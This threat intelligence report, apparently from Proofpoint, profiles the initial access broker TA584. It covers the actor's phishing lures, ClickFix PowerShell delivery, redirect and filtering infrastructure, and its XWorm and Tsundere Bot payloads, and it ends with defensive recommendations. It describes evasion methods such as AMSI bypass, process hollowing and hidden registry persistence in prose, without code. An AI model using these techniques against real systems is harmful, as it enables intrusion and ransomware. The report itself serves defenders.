TA584 Accelerates Global Email Attacks in 2025, Adopts ClickFix and Deploys New Tsundere Bot Malware

Multiple sophisticated cybercriminal threat actors remain active across the global threat landscape, but one of the most consistently prolific is TA584. This actor operates as a high-volume initial access broker (IAB), running large-scale campaigns that target organizations worldwide. During the second half of 2025, TA584 demonstrated notable evolution across its attack chains, including adoption of the ClickFix social engineering technique, more deliberate geographic and language-specific targeting, and the introduction of a new malware family known as Tsundere Bot. TA584 activity overlaps with a cluster tracked separately as Storm-0900.

Throughout 2025, TA584 steadily increased its operational tempo. Monthly campaign volume tripled between March and December 2025, reflecting both growing confidence and a shift toward faster, more iterative operations.

TA584 Background

Tracked since November 2020, TA584 has historically relied on a range of tactics, techniques, and procedures (TTPs) for initial access. Earlier delivery methods included macro-enabled Excel documents, heavily filtered URLs, traffic distribution services (TDS), and geo-fenced landing pages.

While TA584 has been active for several years, its earlier campaigns followed relatively predictable and long-lived patterns. Infrastructure, lure themes, and delivery mechanisms were often reused for extended periods. In contrast, activity observed throughout 2025 shows a clear departure from this model. Campaigns are now launched, modified, and retired rapidly, resulting in high campaign churn and short operational lifespans.

Rather than refining a single successful attack chain, TA584 favors constant iteration. Throughout 2025, the actor ran overlapping campaigns that used distinct lure themes, branding, and landing pages, with individual campaigns often remaining active for only hours or days. This sustained pattern highlights how modern financially motivated threat actors adapt aggressively to defensive pressure by prioritizing speed and variability over longevity.

Data Scope and Methodology

This analysis focuses on email as the initial access vector for TA584 activity. Although the actor has been monitored intermittently since 2020, the findings here primarily cover activity observed in 2025, when campaign volume, operational tempo, and technical diversity increased significantly.

The analysis traces activity from initial email delivery through malware execution, providing visibility into how TA584 adapts social engineering techniques, delivery infrastructure, and payload execution while maintaining certain consistent behaviors. The scope is intentionally limited to pre-compromise and early execution stages, including email lure construction, brand impersonation, localization strategies, landing page design, filtering infrastructure, and malware execution.

Campaigns were identified and clustered using multiple correlated attributes, such as delivery characteristics, shared or structurally similar infrastructure, execution behaviors, geofencing logic, landing page layouts, malware configurations, and recurring lure elements. Attribution to TA584 is based on long-term tracking continuity and recurring patterns observed across multiple years.

TA584’s 2025 activity demonstrates how rapid campaign turnover and deliberate variability reduce the effectiveness of static indicators, complicating traditional tracking and detection approaches.

Campaign Details

Social Engineering

TA584 impersonates a wide range of organizations, including job recruitment firms (for example, Michael Page and Adecco), business services (such as BBB and Companies House), and well-known brands like PayPal, OSHA, Medicare, OneDrive, and YourCostSolutions.

Healthcare is the most frequently impersonated vertical, followed by government entities. Campaigns have impersonated hospitals, care facilities, and multiple government agencies across several countries.

Social engineering content is a key strength of TA584 operations. Emails and landing pages are tightly aligned, professionally designed, and highly believable. Brand impersonation reinforces credibility, but brands are typically used only briefly before being rotated out in subsequent campaigns. Brand selection often aligns with geographic targeting, leveraging regionally relevant organizations to increase trust.

Despite constant surface-level changes, the underlying social engineering objective remains consistent: create urgency or implied legitimacy to prompt recipients to view documents, review transactions, or resolve supposed issues. This variability significantly reduces the effectiveness of content-based detection and increases the likelihood that at least some variants bypass filtering controls.

Observed lure themes during 2025 included debt collection, payment processing, event invitations, tax obligations, medical test results, healthcare benefits, parking tickets, recruiting messages, and business complaints.

In December 2025, one campaign introduced a particularly unusual technique: embedding a photo of purported physical mail that included the recipient’s name and address. This level of personalization likely increased lure credibility. While rare, Proofpoint has observed similar techniques used recently by TA2725.

Attack Chain

TA584 uses multiple email delivery methods. In 2025, most campaigns originated from compromised individual email accounts. Each campaign typically used several display names aligned with the lure theme, and a single wave could involve hundreds of compromised senders across unrelated, legitimate, and often aged domains.

Occasionally, TA584 also sent messages via third-party email service providers such as SendGrid and Amazon SES, likely using stolen credentials and authenticated domains, which requires DNS-level access.

Because emails originate from authenticated, aged senders and vary heavily in subject lines and URLs, tracking and clustering campaigns based solely on email characteristics is challenging.

Emails generally contain unique URLs per recipient that perform geofencing and IP-based filtering. If checks are passed, the target is redirected to a lure-matched landing page. Between March 2021 and July 2025, landing pages typically featured a countdown timer, recipient personalization, and a CAPTCHA. Solving the CAPTCHA revealed a download button for a zipped JavaScript file or a shortcut (.lnk).

Earlier campaigns also delivered macro-enabled Excel documents (EtterSilent) directly after filtering checks, leading to malware installation if macros were enabled.

Adoption of ClickFix

From late July 2025 onward, TA584 shifted to using the ClickFix social engineering technique. ClickFix relies on fake error dialogs that instruct users to manually copy, paste, and execute malicious commands, effectively bypassing many traditional download-based protections.

Current campaigns use unique URLs that lead to customized landing pages featuring a “slide” CAPTCHA. Once solved, victims are presented with ClickFix instructions that execute a PowerShell command. This command retrieves a remote intermediate PowerShell script containing obfuscated code that executes the malware payload.

The script is only retrievable from the same IP address that accessed the landing page. Once retrieved, the landing page confirms execution and redirects the user to a benign site (for example, docusign[.]com), reducing suspicion.

Redirect Infrastructure

TA584 consistently uses layered redirect chains and intermediary resources to obscure payload delivery. URLs are not reused across campaigns, and redirect infrastructure is frequently rotated, often involving third-party criminal services.

Earlier campaigns commonly relied on Cookie Reloaded (Prometheus TDS). In 2025, TA584 occasionally used Keitaro TDS but most frequently relied on 404 TDS. This system uses short-lived redirect links—typically valid for one day—and historically leveraged HTTP 404 responses combined with meta refresh redirects.

After third-party filtering, victims are redirected to actor-controlled domains where additional IP-based filtering is performed. Final landing pages are hosted under campaign-specific paths. Domains are typically used for only one or two campaigns and rotated weekly, although backend IP addresses often remain static for extended periods. For example, 94[.]159[.]113[.]37 has been in use since April 2025.

Because of layered filtering and redirects, full attack chains are rarely captured by public sandboxes or URL scanners.

Targeting

Campaigns typically target hundreds of organizations, with volumes ranging from a few thousand to nearly 200,000 emails per campaign.

Historically, TA584 focused on North America, the UK, and Ireland. In late July 2025, the actor expanded to consistently target Germany at scale, followed by broader European targeting during the summer. By fall 2025, activity shifted back toward North America, with limited but recurring targeting of Australia.

Campaigns often focus on specific regions, rotating geography frequently. In some cases, different regions were targeted within the same week using entirely distinct branding, languages, and lure themes. This rotational targeting helps sustain high operational tempo while minimizing repeated exposure within any single region.

Malware Payloads

TA584’s primary payload throughout 2025 was XWorm, using the “P0WER” configuration. Beginning in late November 2025, the actor also began distributing Tsundere Bot, which quickly became a favored payload alongside XWorm.

Previously observed payloads include Ursnif (2020–2022), LDR4 (2022–2023), WarmCookie (2024), Xeno RAT (2024), and Cobalt Strike (2024). A single September 2025 campaign delivered DCRAT, which was not reused.

Tsundere Bot

Tsundere Bot was first observed in Proofpoint data in August 2025 and adopted by TA584 in late November 2025. It is a malware-as-a-service platform with backdoor and loader functionality, marketed through panels identified as “Tsundere Netto” and “Tsundere Reborn.”

The malware requires Node.js, which is installed via MSI installers or PowerShell scripts generated by the C2 panel. Capabilities include:

Ethereum-based C2 resolution using a variant of EtherHiding, with consensus logic across multiple RPC providers
WebSocket-based C2 communication
Locale checks that terminate execution on CIS systems
Extensive system profiling and unique victim ID generation
Arbitrary JavaScript execution
Persistent heartbeat communication

The C2 panel supports bot management, installer generation, automated tasking, SOCKS5 proxy usage, and bot resale.

Proofpoint assesses with high confidence that Tsundere Bot infections can lead to ransomware deployment.

XWorm “P0WER” Variant

The XWorm “P0WER” configuration is delivered via PowerShell scripts generated by a MaaS builder. The script disables AMSI using a reflection-based initialization failure, reconstructs embedded payloads, and reflectively loads a custom .NET loader.

Execution uses process hollowing, injecting XWorm into a suspended RegSvcs.exe process, making the infection effectively file-less. Persistence is established via a SharpHide-based registry technique that inserts null bytes into key names, hiding malicious entries from standard tools.

This persistence launches a hidden PowerShell process on every boot, dynamically fetching payloads to maintain modular, resilient access.

Attribution and Assessment

Proofpoint assesses with high confidence that TA584 operates as an initial access broker whose infections frequently lead to ransomware. The actor has maintained operational continuity since 2020 and shows strong indicators of integration within Russian-language cybercriminal ecosystems.

Defensive Recommendations

Restrict PowerShell usage to users who require it
Enforce application control policies to block Node.js execution from user-writable paths
Detect PowerShell or CMD spawning node.exe from non-standard locations
Monitor or block outbound access to Ethereum RPC endpoints
Inspect WebSocket traffic for unknown destinations
Consider disabling Windows+R for non-technical users
Train users to recognize and report ClickFix-style social engineering

Conclusion

While many major threat actors disappeared from email telemetry in 2025, TA584 remained active and adaptive. Its increased operational tempo, geographic expansion, and adoption of new malware demonstrate an ongoing effort to broaden impact and evade defenses. Organizations should remain vigilant, prioritize behavioral detection, and implement layered controls to mitigate TA584-style intrusion paths.